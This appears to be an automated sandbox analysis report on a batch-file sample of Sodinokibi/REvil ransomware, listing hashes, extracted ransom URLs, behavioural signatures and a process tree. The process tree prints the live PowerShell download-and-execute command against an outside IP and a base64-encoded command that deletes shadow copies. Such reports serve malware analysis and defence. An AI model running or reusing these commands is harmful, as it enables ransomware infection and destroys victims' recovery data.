Analysis
-
max time kernel
136s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
b0d58156fab428d26b46727824eabf37.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
b0d58156fab428d26b46727824eabf37.bat
Resource
win10v200430
General
-
Target
b0d58156fab428d26b46727824eabf37.bat
-
Size
214B
-
MD5
80701ef329f0effbde1182ab9f26be31
-
SHA1
b948c5f5d1d8d2f7bb793db6ed2119d8143b8084
-
SHA256
bfecfd11f233e3531ec0241d1186c28fd737e3b476a51e4000312296ab8c0c1c
-
SHA512
f2a24c2587f2621b2a9d571522a4e0126af41f482d2e942579c199acacb98a4783dd03f06635173f59c6e37c2ad55f8778a7c0841e4848dee533ddf232ce5b9d
Malware Config
Extracted
http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37
Extracted
C:\70f6a4-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5E2B4ACBB61DFC6D
http://decryptor.cc/5E2B4ACBB61DFC6D
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1388 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 828 wrote to memory of 1388 828 cmd.exe powershell.exe PID 1388 wrote to memory of 1776 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1776 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1776 1388 powershell.exe powershell.exe PID 1388 wrote to memory of 1776 1388 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeBackupPrivilege 1592 vssvc.exe Token: SeRestorePrivilege 1592 vssvc.exe Token: SeAuditPrivilege 1592 vssvc.exe Token: SeTakeOwnershipPrivilege 1388 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\758.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1776 powershell.exe 1776 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe 1388 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1388 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 20 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\70f6a4-readme.txt powershell.exe File opened for modification \??\c:\program files\UseSet.3g2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\70f6a4-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterSkip.wmv powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.au powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\70f6a4-readme.txt powershell.exe File opened for modification \??\c:\program files\UninstallGrant.wmv powershell.exe File opened for modification \??\c:\program files\BlockExpand.vdw powershell.exe File opened for modification \??\c:\program files\EnterRequest.jpg powershell.exe File opened for modification \??\c:\program files\JoinExport.css powershell.exe File opened for modification \??\c:\program files\SelectCompress.search-ms powershell.exe File opened for modification \??\c:\program files\RestartReset.xla powershell.exe File opened for modification \??\c:\program files\SetEnter.vsx powershell.exe File opened for modification \??\c:\program files\ShowConnect.vsx powershell.exe File opened for modification \??\c:\program files\UseCopy.crw powershell.exe File created \??\c:\program files (x86)\70f6a4-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableComplete.wvx powershell.exe File opened for modification \??\c:\program files\GetExport.docx powershell.exe File opened for modification \??\c:\program files\InvokeApprove.3gp2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\70f6a4-readme.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
PID:1388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1592